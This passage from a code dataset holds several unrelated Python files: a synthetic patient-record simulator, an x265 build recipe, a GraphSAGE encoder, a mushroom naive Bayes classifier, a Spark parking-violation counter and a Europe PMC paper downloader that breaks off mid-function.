np.arange(1,100)\nbloodP = np.arange(70,190,10)\nGlucose = np.arange(3,8)\nMedicalHist = []\nWearable = np.arange(1000,7000,200)\nPreSensorK = np.arange(0,2)\nPreSensorB = np.arange(0,2)\nPreSensorBa = np.arange(0,2)\nPreSensorL = np.arange(0,2)\nTemperature = np.arange(18,26)\nLights = np.arange(0,2)\nWindow = np.arange(0,2)\nIntruder = np.arange(0,2)\nElectricity = np.arange(1000,7000,200)\nExternalGate = np.arange(0,2)\n\n\n# f = open('source.txt', encoding='utf-8', errors='ignore')\n# lines = f.readlines()\n# name = []\n# for xx in lines:\n#\n# print(xx)\n# input(\"wait\")\n\nf = codecs.open('name.txt', encoding='utf-8', errors='ignore')\nlines = f.readlines()\nname = []\nfor xx in lines:\n\n name.append(xx.lstrip().rstrip().lower())\n\nf = codecs.open('diseases.txt', encoding='utf-8', errors='ignore')\nlines = f.readlines()\ndis = []\nfor xx in lines:\n\n dis.append(xx.rstrip())\n\n\n\ndef myround(x, base=5):\n return int(base * round(float(x)/base))\n\n\nusers = []\nuser = \"\"\nuser1 =\"\"\nuser2 = \"\"\nuser3 = \"\"\nuser4 = \"\"\nmaxl = 0\n\nf0 = open('source.txt', 'w')\nf1 = open('view1.txt', 'w')\nf2 = open('view2.txt', 'w')\nf3 = open('view3.txt', 'w')\nf4 = open('view4.txt', 'w')\nf00 = open('sourceTest.txt', 'w')\nf11 = open('view1Test.txt', 'w')\nf22 = open('view2Test.txt', 'w')\nf33 = open('view3Test.txt', 'w')\nf44 = open('view4Test.txt', 'w')\nfake = Faker()\n# for nn in range(len(name)):\nfor numg in range(20000):\n # print(fake.name())\n\n gname = fake.name()\n user = user + \"n\" + \":\"+ gname + \"|\"\n user1 = user1 + \"n\" + \":\"+ \"*\" + \"|\"\n user2 = user2 + \"n\" + \":\"+ gname + \"|\"\n user3 = user3 + \"n\" + \":\"+ \"*\" + \"|\"\n user4 = user4 + \"n\" + \":\" + gname + \"|\"\n\n\n\n age = np.random.randint(60,90)\n user = user+ \"a\" + \":\"+str(age) + \"|\"\n user1 = user2 + \"a\" + \":\" + str(age) + \"|\"\n user2 = user2 + \"a\" + \":\" + str(int(age/10)) +\"*\" + \"|\"\n user3 = user3 + \"a\" + \":\" + str(int(age/10)) +\"*\" + \"|\"\n user4 = user4 + \"a\" + \":\" + str(myround(age)) + \"|\"\n\n\n\n\n\n\n gen = [\"m\",\"f\"]\n gender = np.random.randint(0,2)\n user = user+ \"g\" + \":\"+ str(gen[gender]) + \"|\"\n user1 = user1 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n user2 = user2 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n user3 = user3 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n user4 = user4 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n\n\n\n\n height = np.random.randint(150,190)\n user = user+ \"h\" + \":\"+str(height) + \"|\"\n user1 = user1 + \"h\" + \":\" + str(height) + \"|\"\n user2 = user2 + \"h\" + \":\" + str(height) + \"|\"\n user3 = user3 + \"h\" + \":\" + str(myround(height)) + \"|\"\n user4 = user4 + \"h\" + \":\" + str(myround(height)) + \"|\"\n\n\n weight = np.random.randint(60,120)\n user = user+ \"w\" + \":\"+ str(weight) + \"|\"\n\n user1 = user1 + \"w\" + \":\" + str(weight) + \"|\"\n user2 = user2 + \"w\" + \":\" + str(weight) + \"|\"\n user3 = user3 + \"w\" + \":\" + str(myround(weight)) + \"|\"\n user4 = user4 + \"w\" + \":\" + str(myround(weight)) + \"|\"\n\n\n zip = np.random.randint(10000,99000)\n user = user+ \"ad\" + \":\"+str(zip) + \"|\"\n\n user1 = user1 + \"ad\" + \":\" + str(zip) + \"|\"\n user2 = user2 + \"ad\" + \":\" + str(myround(weight,1000)) + \"|\"\n user3 = user3 + \"ad\" + \":\" + str(zip) + \"|\"\n user4 = user4 + \"ad\" + \":\" + str(myround(weight,1000)) + \"|\"\n\n\n phone = np.random.randint(1000000,9999999)\n user = user+ \"ph\" + \":\"+str(phone) + \"|\"\n user1 = user1 + \"ph\" + \":\" + str(phone) + \"|\"\n user2 = user2 + \"ph\" + \":\" + str(phone) + \"|\"\n user3 = user3 + \"ph\" + \":\" + str(phone) + \"|\"\n user4 = user4 + \"ph\" + \":\" + \"unk\" + \"|\"\n\n\n mar = np.random.randint(0,7)\n user = user+ \"m\" + \":\"+ str(mar) + \"|\"\n\n user1 = user1+ \"m\" + \":\"+ str(mar) + \"|\"\n if mar >0:\n mar = 1\n user2 = user2+ \"m\" + \":\"+ str(mar) + \"|\"\n user3 = user3+ \"m\" + \":\"+ str(mar) + \"|\"\n user4 = user4+ \"m\" + \":\"+ str(mar) + \"|\"\n\n\n\n occ = np.random.randint(0,20)\n user = user+ \"oc\" + \":\"+ str(occ) + \"|\"\n user1 = user1 + \"oc\" + \":\" + str(occ) + \"|\"\n user2 = user2 + \"oc\" + \":\" + str(occ%5) + \"|\"\n user3 = user3 + \"oc\" + \":\" + str(occ%5) + \"|\"\n user4 = user4 + \"oc\" + \":\" + str(occ%5) + \"|\"\n\n\n nn = np.random.randint(0,len(dis))\n user = user+ \"ds\" + \":\"+ dis[nn] + \"|\"\n user1 = user1 + \"ds\" + \":\" + dis[nn] + \"|\"\n user2 = user2 + \"ds\" + \":\" + dis[nn] + \"|\"\n user3 = user3 + \"ds\" + \":\" + dis[nn] + \"|\"\n diss = dis[nn]\n if nn >0 and nn<6:\n diss = \"heart\"\n if nn >6 and nn<11:\n diss = \"lung\"\n if nn >11 and nn<15:\n diss = \"dementia\"\n\n\n user4 = user4 + \"ds\" + \":\" + diss + \"|\"\n\n\n tuser = user\n tuser1 = user1\n tuser2 = user2\n tuser3 = user3\n tuser4 = user4\n\n # for i in range(1,2500):\n\n # user = tuser\n # user1 = tuser1\n # user2 = tuser2\n # user3 = tuser3\n # user4 = tuser4\n\n # user = user + \"ts\" + \":\" + str(i) + \"|\"\n # user1 = user1 + \"ts\" + \":\" + str(i) + \"|\"\n # user2 = user2 + \"ts\" + \":\" + str(i) + \"|\"\n # user3 = user3 + \"ts\" + \":\" + str(i) + \"|\"\n # user4 = user4 + \"ts\" + \":\" + str(i) + \"|\"\n\n bp = np.random.randint(70, 190)\n user = user + \"bp\" + \":\" + str(bp) + \"|\"\n user1 = user1 + \"bp\" + \":\" + str(130) + \"|\"\n user2 = user2 + \"bp\" + \":\" + str(bp) + \"|\"\n user3 = user3 + \"bp\" + \":\" + str(bp) + \"|\"\n user4 = user4 + \"bp\" + \":\" + str(130) + \"|\"\n\n\n gc = np.random.randint(3, 8)\n user = user + \"gc\" + \":\" + str(gc) + \"|\"\n user1 = user1 + \"gc\" + \":\" + str(5) + \"|\"\n user2 = user2 + \"gc\" + \":\" + str(gc) + \"|\"\n user3 = user3 + \"gc\" + \":\" + str(gc) + \"|\"\n user4 = user4 + \"gc\" + \":\" + str(5) + \"|\"\n\n we = np.random.randint(1000,7000)\n user = user + \"we\" + \":\" + str(we) + \"|\"\n user1 = user1 + \"we\" + \":\" + str(we) + \"|\"\n user2 = user2 + \"we\" + \":\" + str(we) + \"|\"\n user3 = user3 + \"we\" + \":\" + str(we) + \"|\"\n user4 = user4 + \"we\" + \":\" + str(we) + \"|\"\n\n sen = np.random.randint(1, 5)\n user = user + \"ss\" + \":\" + str(sen) + \"|\"\n user1 = user1 + \"ss\" + \":\" + str(sen) + \"|\"\n user2 = user2 + \"ss\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"ss\" + \":\" + str(sen) + \"|\"\n user4 = user4 + \"ss\" + \":\" + str(sen) + \"|\"\n\n\n temp = np.random.randint(16, 30)\n user = user + \"tp\" + \":\" + str(temp) + \"|\"\n user1 = user1 + \"tp\" + \":\" + str(temp) + \"|\"\n user2 = user2 + \"tp\" + \":\" + str(temp) + \"|\"\n user3 = user3 + \"tp\" + \":\" + str(temp) + \"|\"\n user4 = user4 + \"tp\" + \":\" + str(myround(temp)) + \"|\"\n\n light = np.random.randint(1, 5)\n user = user + \"l\" + \":\" + str(light) + \"|\"\n user1 = user1 + \"l\" + \":\" + str(light) + \"|\"\n user2 = user2 + \"l\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"l\" + \":\" + \"unk\" + \"|\"\n user4 = user4 + \"l\" + \":\" + str(light) + \"|\"\n\n window = np.random.randint(1, 3)\n user = user + \"win\" + \":\" + str(window) + \"|\"\n\n user1 = user1 + \"wn\" + \":\" + str(window) + \"|\"\n user2 = user2 + \"wn\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"wn\" + \":\" + str(window) + \"|\"\n user4 = user4 + \"wn\" + \":\" + \"unk\" + \"|\"\n\n\n # i = np.random.randint(0, 2)\n # user = user + \"int\" + \":\" + str(i) + \"|\"\n # user1 = user1 + \"int\" + \":\" + str(i) + \"|\"\n # user2 = user2 + \"int\" + \":\" + \"unk\" + \"|\"\n # user3 = user3 + \"int\" + \":\" + str(i) + \"|\"\n # user4 = user4 + \"int\" + \":\" + \"unk\" + \"|\"\n\n\n el = np.random.randint(1000,7000)\n user = user + \"el\" + \":\" + str(el) + \"|\"\n user1 = user1 + \"el\" + \":\" + str(myround(el,500)) + \"|\"\n user2 = user2 + \"el\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"el\" + \":\" + \"unk\" + \"|\"\n user4 = user4 + \"el\" + \":\" + str(myround(el,500)) + \"|\"\n\n\n\n\n ext = np.random.randint(0, 2)\n user = user + \"ex\" + \":\" + str(ext) + \"|\"\n user1 = user1 + \"ex\" + \":\" + str(ext) + \"|\"\n user2 = user2 + \"ex\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"ex\" + \":\" + str(ext) + \"|\"\n user4 = user4 + \"ex\" + \":\" + \"unk\" + \"|\"\n\n user = user + \"eos\"\n user1 = user1 + \"eos\"\n user2 = user2 + \"eos\"\n user3 = user3 + \"eos\"\n user4 = user4 + \"eos\"\n\n\n if len(user)>maxl:\n maxl = len(user)\n\n\n if numg<100000:\n\n #print(user ,file = f0)\n print(f0),user\n\n\n #print(user1 , file=f1)\n print(f1), user1\n\n #print(user2 , file=f2)\n print(f2), user2\n\n #print(user3 , file=f3)\n print(f3), user3\n\n #print(user4, file=f4)\n print(f4), user4\n else:\n #print(user ,file = f00)\n print(f00), user\n\n\n #print(user1 , file=f11)\n print(f11), user1\n\n #print(user2 , file=f22)\n print(f22), user2\n\n\n #print(user3 , file=f33)\n print(f33), user3\n\n #print(user4, file=f44)\n print(f44), user4\n\n\n\n\n user = \"\"\n user1 = \"\"\n user2 = \"\"\n user3 = \"\"\n user4 = \"\"\nprint(maxl)\nf0.close()\nf1.close()\nf2.close()\nf3.close()\nf4.close()\n\nf00.close()\nf11.close()\nf22.close()\nf33.close()\nf44.close()","sub_path":"Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":9123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631122542","text":"import info\n\n\nclass subinfo(info.infoclass):\n def setTargets(self):\n for ver in [\"3.4\", \"3.5\"]:\n self.targets[ver] = f\"http://deb.debian.org/debian/pool/main/x/x265/x265_{ver}.orig.tar.gz\"\n self.targetInstSrc[ver] = f\"x265_{ver}/source\"\n self.patchToApply[ver] = [(\"mingw-no-pdb.patch\", 1)]\n self.targetDigests[\"3.4\"] = ([\"c2047f23a6b729e5c70280d23223cb61b57bfe4ad4e8f1471eeee2a61d148672\"], CraftHash.HashAlgorithm.SHA256)\n self.targetDigests[\"3.5\"] = ([\"e70a3335cacacbba0b3a20ec6fecd6783932288ebc8163ad74bcc9606477cae8\"], CraftHash.HashAlgorithm.SHA256)\n self.description = \"H.265/HEVC video stream encoder\"\n self.defaultTarget = \"3.5\"\n\n def setDependencies(self):\n self.runtimeDependencies[\"virtual/base\"] = None\n self.buildDependencies[\"dev-utils/nasm\"] = None\n\n\nfrom Package.CMakePackageBase import *\n\n\nclass Package(CMakePackageBase):\n def __init__(self, **args):\n CMakePackageBase.__init__(self)\n self.subinfo.options.configure.args = \"-DEXPORT_C_API=ON -DENABLE_SHARED=ON -DENABLE_ASSEMBLY=ON -DENABLE_CLI=OFF\"\n","sub_path":"libs/x265/x265.py","file_name":"x265.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"365276405","text":"from jinja2 import Environment, FileSystemLoader\nimport os \nimport glob\nroot = os.path.dirname(os.path.abspath(__file__))\ntemplates_dir = os.path.join(root, 'templates')\nenv = Environment( loader = FileSystemLoader(templates_dir) )\ntemplate = env.get_template('imageview.html')\n \n \nfilename = os.path.join(root,'upload/static','imageview_updated.html')\nslitted_path = root.split(\"/\")\nimage_path = os.path.join(\"/\".join(slitted_path[:-1]),'instance/images/')\nimage_path2 = '../../../instance/images/'\nlocations = []\nfor folder in glob.glob(image_path + \"*/\"):\n\tprint(folder.split(\"/\")[-2])\n\tlocations.append(image_path2 + folder.split(\"/\")[-2] + \"/thumbnail.png\")\n\tprint(locations)\n\nwith open(filename, 'w') as fh:\n fh.write(template.render(\n paths = locations,\n ))\n #https://code-maven.com/minimal-example-generating-html-with-python-jinja","sub_path":"app/gen_image_views.py","file_name":"gen_image_views.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"111591780","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torch.nn.functional as F\n\nclass Encoder(nn.Module):\n \"\"\"\n Encodes a node's using 'convolutional' GraphSage approach\n \"\"\"\n def __init__(self, feature_dim, \n embed_dim, adj_lists, aggregator, \n feature_transform=False): \n super(Encoder, self).__init__()\n\n self.feat_dim = feature_dim\n self.adj_lists = adj_lists\n self.aggregator = aggregator\n\n self.embed_dim = embed_dim\n self.weight = nn.Parameter(\n torch.FloatTensor(feature_dim, embed_dim))\n init.xavier_uniform(self.weight)\n \n self.bn = nn.BatchNorm1d(embed_dim)\n self.relu = nn.LeakyReLU()\n\n def forward(self, raw_features, nodes):\n \"\"\"\n Generates embeddings for a batch of nodes.\n\n nodes -- list of nodes\n \"\"\"\n\n neigh_feats = self.aggregator.forward(raw_features, nodes, [self.adj_lists[node] for node in nodes])\n\n x = neigh_feats.mm(self.weight)\n x = self.bn(x)\n x = self.relu(x)\n return x\n","sub_path":"graphsage/parcellation_encoders.py","file_name":"parcellation_encoders.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"145062801","text":"import pandas as pd\nfrom sklearn.metrics import mean_squared_error as mse\n\nwsp = pd.read_csv('../tmp/wqs_2017-12-21-11-02-16-0.0432.csv',header=None)\nlgb = pd.read_csv('../result/result_20171225.csv',header=None)\nresult = pd.DataFrame()\n\nresult['ID'] = wsp[0]\nresult['Y'] = 2.0 / (1.0 / wsp[1] + 1.0/lgb[1])\n\nresult[['ID','Y']].to_csv('../result/result_20171227_h_lgb_xgb.csv',index=False,header=False)\n","sub_path":"201704TO201802CodeBackup-master/201704TO201802CodeBackup-master/201801_Tianchi_工业AI第一赛季/code/2.simply_merge.py","file_name":"2.simply_merge.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"56475640","text":"import pandas as pd\nimport numpy as np\n\ndata = np.array([\n [1, 1, 0],\n [1, 1, 0],\n [1, 1, 1],\n [0, 0, 2],\n [0, 1, 0],\n [0, 0, 2]])\n\ndf = pd.DataFrame(data, columns=['EdibleOrPoisonous', 'RedColor', 'CapSurface'])\nprint(df)\n\ntrain_df = df.copy()\ncol = np.array(['RedColor', 'CapSurface'])\nfor f in range(1, df.shape[1]):\n for elem in df.iloc[:, f].unique():\n train_df[col[f-1]+'_'+str(elem) ] = (train_df.iloc[:, f]==elem)+0.0\n\ntrain_df = train_df.drop(columns=col)\nprint(train_df)\n\n\nX = train_df.iloc[:, 1:].values\ny = train_df.iloc[:, 0].values\n\nfrom sklearn.naive_bayes import MultinomialNB\nclf = MultinomialNB(alpha=0)\nclf.fit(X, y)\nclf.predict_proba(np.array( [[1,0,1,0,0]] ))\n\nclf = MultinomialNB(alpha=0)\nclf.fit(X, y)\np = clf.predict_proba(np.array([[1,0,0,1,0]]))\nprint(p)\n\nfrom sklearn.naive_bayes import MultinomialNB\nclf=MultinomialNB(alpha=1)\nclf.fit(X, y)\np = clf.predict_proba(np.array( [[1,0,0,1,0]] ) )\nprint(p)\n\n\n#*********************REAL Example*****************\ndf = pd.read_csv('./mushrooms.csv')\nfrom sklearn.utils import shuffle\n\ndf = shuffle(df, random_state=42)\nprint(df)\n\n\ntrain_df = df[:7000]\ntest_df = df[7000:]\n\nprint(train_df)\n\n\n# from this we can derive the accuracy of the majority class classifier\nprint(train_df['class'].value_counts(normalize=1))\n\ntarget = []\nfor i in range(len(train_df['class'].values)):\n if train_df['class'].values[i]=='e':\n target.append(0)\n if train_df['class'].values[i]=='p':\n target.append(1)\n if train_df['class'].values[i]=='u':\n target.append(2)\n\ntarget = np.array(target)\nprint(target)\n\ndel train_df['class']\n\n#we transform inputs for multinomialNB\ncols = list(train_df)\nprint(\"cols--->\", cols)\nfor f in cols:\n for elem in df[f].unique():\n train_df[f+'_'+str(elem)] = (train_df[f]==elem)\n\n#we delete old columns\nprint(\"Before deleting---->\", train_df)\nfor f in cols:\n del train_df[f]\nprint(\"after deleting----->\", train_df)\ntrain_df.head()\ntrain_df=train_df+0.0\nprint(\"after adding 0.0.----->\", train_df)\n\n\nfrom sklearn.naive_bayes import MultinomialNB\n\nclf = MultinomialNB()\ntrain_x = train_df.values\nclf.fit(train_x, target)\n\nfrom sklearn.metrics import accuracy_score\ny_pred = clf.predict(train_x)\na = accuracy_score(y_pred, target)\nprint(a)\n\n\ntest_y = test_df['class']\ndel test_df['class']\nfor f in cols:\n for elem in df[f].unique():\n test_df[f+'_'+str(elem)] = (test_df[f]==elem)\n\nfor f in cols:\n del test_df[f]\n\nprint(test_df)\n\ntest_x = test_df.values\n\ntest_y1=[]\nfor i in range(len(test_y)):\n if test_y.values[i] == 'e':\n test_y1.append(0)\n if test_y.values[i] == 'p':\n test_y1.append(1)\n if test_y.values[i] == 'u':\n test_y1.append(2)\n\ntest_y1 = np.array(test_y1)\n\ny_pred = clf.predict(test_x)\naccuracy_score(y_pred, test_y1)\n\nfrom sklearn.metrics import confusion_matrix\nCC = confusion_matrix(test_y1, y_pred)\nprint(CC)\n\n\n\n\n\n\n","sub_path":"mushroom_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264410710","text":"#!/usr/bin/env python\n\nimport sys\nfrom csv import reader\n\n\nparking = sc.textFile(sys.argv[1], 1)\nparking = parking.mapPartitions(lambda x: reader(x))\n\nplateid_state = parking.map(lambda x: ((x[14], x[16]), 1))\ntotal_plateid_state = plateid_state.reduceByKey(lambda x, y: x + y)\n\n# get the top 20 vehicles with the greatest number of violations\nsorted_list = total_plateid_state.sortBy(lambda x: (-x[1], x[0][0]))\ngreatest = sc.parallelize(sorted_list.take(20))\ngreatest = greatest.map(lambda x: (x[0][0], x[0][1], x[1]))\n\n# output\noutput = greatest.map(lambda x: x[0] + ', ' + x[1] + '\\t' + str(x[2]))\noutput.saveAsTextFile('task6.out')","sub_path":"task6/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"325340965","text":"import configparser\nimport json\nimport time\nimport zipfile\nimport io\nimport copy\nimport os\nimport logging\nimport requests\nimport pandas as pd\nimport xmltodict\nfrom tqdm import tqdm\nfrom dict2xml import dict2xml\n\n\nclass DownloadTools:\n \"\"\"Generic tools for retrieving literature\"\"\"\n\n def __init__(self, api):\n \"\"\"[summary]\n\n :param api: [description]\n :type api: [type]\n \"\"\"\n with open(\n os.path.join(os.path.dirname(__file__), \"config.ini\")\n ) as file_handler:\n config_file = file_handler.read()\n config = configparser.RawConfigParser(allow_no_value=True)\n config.read_string(config_file)\n\n self.posturl = config.get(api, \"posturl\")\n self.citationurl = config.get(api, \"citationurl\")\n self.referencesurl = config.get(api, \"referencesurl\")\n self.xmlurl = config.get(api, \"xmlurl\")\n self.zipurl = config.get(api, \"zipurl\")\n self.suppurl = config.get(api, \"suppurl\")\n\n def postquery(self, headers, payload):\n \"\"\"\n\n :param headers: headers that will be sent to eupmc rest api\n :param payload: payload that will be sent to eupmc rest api\n :returns: Python dictionary containting the output got from eupmc rest api\n\n \"\"\"\n logging.debug(\"*/RESTful request for fulltext.xml (D)*/\")\n start = time.time()\n request_handler = requests.post(\n self.posturl, data=payload, headers=headers)\n stop = time.time()\n logging.debug(\"*/Got the Query Result */\")\n logging.debug(\"Time elapsed: %s\", (stop - start))\n return xmltodict.parse(request_handler.content)\n\n @staticmethod\n def check_or_make_directory(directory_url):\n \"\"\"Checks if the directory exists. If not, makes the directory\n\n :param directory_url: directory url to check\n\n \"\"\"\n if not os.path.isdir(directory_url):\n os.makedirs(directory_url)\n\n @staticmethod\n def buildquery(\n cursormark,\n page_size,\n query,\n synonym=True,\n ):\n \"\"\"\n\n :param cursormark: the cursonmark for the rest api page.\n :param page_size: the size of each page in the output.\n :param query: the query passed on to payload\n :param synonym: whether synonym should be or not (Default value = True)\n :returns: headers': headers, 'payload': payload}\n :rtype: Python dictionary containting headers and payload in the format\n\n \"\"\"\n\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\"}\n payload = {\n \"query\": query,\n \"resultType\": \"core\",\n \"cursorMark\": cursormark,\n \"pageSize\": page_size,\n \"synonym\": synonym,\n \"format\": \"xml\",\n \"sort_PMCID\": \"y\",\n }\n logging.debug(\"*/submitting RESTful query (I)*/\")\n return {\"headers\": headers, \"payload\": payload}\n\n @staticmethod\n def write_or_append_to_csv(df_transposed, name=\"europe_pmc.csv\"):\n \"\"\"Writes the csv file or appends to an existing one\n\n :param df_transposed: dataframe to write\n :param name: Default value = 'europe_pmc.csv')\n\n \"\"\"\n path = os.path.join(str(os.getcwd()), name)\n if os.path.exists(path):\n df_transposed.to_csv(path, mode=\"a\", header=False)\n else:\n df_transposed.to_csv(path)\n\n @staticmethod\n def writexml(directory_url, destination_url, content):\n \"\"\"writes xml to the destination\n\n :param directory_url: directory containg destination\n :param destination_url: path to write the xml to\n :param content: xml content\n\n \"\"\"\n if not os.path.isdir(directory_url):\n os.makedirs(directory_url)\n with open(destination_url, \"wb\") as file_handler:\n file_handler.write(content)\n\n @staticmethod\n def make_dict_for_csv(resultant_dict):\n \"\"\"removes the fields downloaded, pdfdownloaded,csvmade for the resultant_dict\n\n :param resultant_dict: dictionary to remove the fields\n :returns: resultant_dict_for_csv\n\n \"\"\"\n resultant_dict_for_csv = copy.deepcopy(resultant_dict)\n for paper in resultant_dict_for_csv:\n paper_dict = resultant_dict_for_csv[paper]\n if \"downloaded\" in paper_dict:\n paper_dict.pop(\"downloaded\")\n if \"pdfdownloaded\" in paper_dict:\n paper_dict.pop(\"pdfdownloaded\")\n if \"jsondownloaded\" in paper_dict:\n paper_dict.pop(\"jsondownloaded\")\n if \"csvmade\" in paper_dict:\n paper_dict.pop(\"csvmade\")\n if \"htmlmade\" in paper_dict:\n paper_dict.pop(\"htmlmade\")\n return resultant_dict_for_csv\n\n @staticmethod\n def write_content_to_destination(url, destination):\n \"\"\"Writes content from url to destination\n\n :param url: Url to get content from\n :param destination: destination to write content to\n\n \"\"\"\n with open(destination, \"wb\") as file:\n response = requests.get(url)\n file.write(response.content)\n\n @staticmethod\n def makejson(path, final_xml_dict):\n \"\"\"Writes json of final_xml_dict to path\n\n :param path: path to write json to\n :param final_xml_dict: python dictionary to make the json from\n\n \"\"\"\n append_write = \"w\"\n with open(path, append_write, encoding=\"utf-8\") as file_handler:\n json.dump(final_xml_dict, file_handler)\n\n @staticmethod\n def clean_dict_for_csv(paperdict):\n \"\"\"Removes the fields pdfdownloaded , jsondownloaded , csvmade from dictionary of paper\n\n :param paperdict: dictionary to remove fields from\n\n \"\"\"\n dict_to_write = dict(paperdict)\n dict_to_write.pop(\"pdfdownloaded\")\n dict_to_write.pop(\"jsondownloaded\")\n dict_to_write.pop(\"csvmade\")\n return dict_to_write\n\n @staticmethod\n def make_dataframe_for_paper_dict(result, return_dict):\n \"\"\"\n\n :param result: \n :param return_dict:\n\n \"\"\"\n dict_for_df = {k: [v] for k, v in return_dict[result].items()}\n df_for_paper = pd.DataFrame(dict_for_df)\n return df_for_paper\n\n @staticmethod\n def conditions_to_download(paperdict):\n \"\"\"Writes the conditions to download pdf, json and csv\n\n :param paperdict: dictionary to write rules for\n\n \"\"\"\n condition_to_down = False\n condition_to_download_pdf = False\n condition_to_download_json = False\n condition_to_download_csv = False\n condition_to_html = False\n if not paperdict[\"downloaded\"]:\n condition_to_down = True\n if not paperdict[\"pdfdownloaded\"]:\n condition_to_download_pdf = True\n if not paperdict[\"jsondownloaded\"]:\n condition_to_download_json = True\n if not paperdict[\"csvmade\"]:\n condition_to_download_csv = True\n if not paperdict[\"htmlmade\"]:\n condition_to_html = True\n return (\n condition_to_down,\n condition_to_download_csv,\n condition_to_download_json,\n condition_to_download_pdf,\n condition_to_html,\n )\n\n @staticmethod\n def make_clickable(link):\n \"\"\"Returns a Html String\n\n :param link: link for href\n\n \"\"\"\n tag_to_return = f'Link'\n if str(link) == \"nan\":\n tag_to_return = \"Not Found\"\n return tag_to_return\n\n def getcitations(self, pmcid, source):\n \"\"\"Gets citations for the paper of pmcid\n\n :param pmcid: pmcid to get the citations\n :param source: source to get the citations from\n :returns: citations xml\n\n \"\"\"\n request_handler = requests.get(\n self.citationurl.format(source=source, pmcid=pmcid)\n )\n return request_handler.content\n\n def getreferences(self, pmcid, source):\n \"\"\"Gets references for the paper of pmcid\n\n :param pmcid: pmcid to get the references\n :param source: source to get the references from\n :returns: references xml\n\n \"\"\"\n request_handler = requests.get(\n self.referencesurl.format(source=source, pmcid=pmcid)\n )\n return request_handler.content\n\n @staticmethod\n def add_scrollbar(text):\n \"\"\"Makes div scrollable\n\n :param text: text to wrap\n\n \"\"\"\n return f'
{text}
'\n\n def make_html_from_dataframe(self, dataframe, url):\n \"\"\"Writes html from pandas dataframe\n\n :param dataframe: Dataframe to make html from\n :param url: URL to write html to\n\n \"\"\"\n dataframe = dataframe.T\n try:\n dataframe = dataframe.drop(columns=[\"full\", \"htmlmade\"])\n except Exception as exception:\n logging.debug(exception)\n if \"htmllinks\" in dataframe:\n try:\n dataframe[\"htmllinks\"] = dataframe[\"htmllinks\"].apply(\n lambda x: self.make_clickable(x)\n )\n except Exception as exception:\n logging.debug(exception)\n if \"pdflinks\" in dataframe:\n try:\n dataframe[\"pdflinks\"] = dataframe[\"pdflinks\"].apply(\n lambda x: self.make_clickable(x)\n )\n except Exception as exception:\n logging.debug(exception)\n try:\n dataframe[\"abstract\"] = dataframe[\"abstract\"].apply(\n lambda x: self.add_scrollbar(x)\n )\n except Exception as exception:\n logging.debug(exception)\n base_html = \"\"\"\n \n \n \n \n \n \n \n \n \n %s\n \n \n \"\"\"\n html = dataframe.to_html(escape=False)\n html_with_pagination = base_html % html\n with open(url, \"w\", encoding=\"utf-8\") as file_handler:\n file_handler.write(html_with_pagination)\n\n def make_html_from_dict(self, dict_to_write_html_from, url):\n \"\"\"Writes html from python dictionary\n\n :param dict_to_write_html_from: dict to make html from\n :param url: URL to write html to\n\n \"\"\"\n df = pd.Series(dict_to_write_html_from).to_frame(\n dict_to_write_html_from[\"full\"][\"pmcid\"]\n )\n self.make_html_from_dataframe(df, url)\n\n def make_references(self, directory_url, paperid, source, referenceurl):\n \"\"\"Downloads the references for the paper with pmcid (paperid) to reference url\n\n :param directory_url: directory containing referenceurl\n :param paperid: pmc id of the paper\n :param source: source to get the citations from\n :param referenceurl: path to write the references to\n\n \"\"\"\n getreferences = self.getreferences(paperid, source)\n self.writexml(directory_url, referenceurl, getreferences)\n\n def make_citations(self, source, citationurl, directory_url, paperid):\n \"\"\"Downloads the citations for the paper with pmcid (paperid) to citation url\n\n :param source: source to get the citations from\n :param citationurl: path to write the citations to\n :param directory_url: directory containing citationurl\n :param paperid: pmc id of the paper\n\n \"\"\"\n getcitations = self.getcitations(paperid, source)\n self.writexml(directory_url, citationurl, getcitations)\n\n @staticmethod\n def readjsondata(path):\n \"\"\"Reads json from path and returns python dictionary\n\n :param path: path to read the json from\n :returns: python dictionary for the json\n\n \"\"\"\n with open(path) as file_handler:\n dict_from_json = json.load(file_handler)\n return dict_from_json\n\n @staticmethod\n def log_making_xml():\n \"\"\"Logs that the xmls are being written\"\"\"\n\n logging.debug(\n \"*/saving xml to per-document directories (CTrees) (D)*/\")\n loggingurl = os.path.join(str(os.getcwd()), \"*\", \"fulltext.xml\")\n logging.info(\"Saving XML files to %s\", loggingurl)\n logging.debug(\"*/Making the Request to get full text xml*/\")\n\n def getxml(self, pmcid):\n \"\"\"Makes a query for the pmcid xml to eupmc rest.\n\n :param pmcid: pmcid of the paper to query for\n :returns: query result\n\n \"\"\"\n request_handler = requests.get(self.xmlurl.format(pmcid=pmcid))\n return request_handler.content\n\n def getsupplementaryfiles(\n self, pmcid, directory_url, destination_url, from_ftp_end_point=False\n ):\n \"\"\"Downloads the supplemetary marks for the paper having pmcid\n\n :param pmcid: pmcid to get the supplementary files\n :param directory_url: directory containg destination\n :param destination_url: path to write the supplementary files to\n :param from_ftp_end_point: Default value = False)\n\n \"\"\"\n\n log_key = 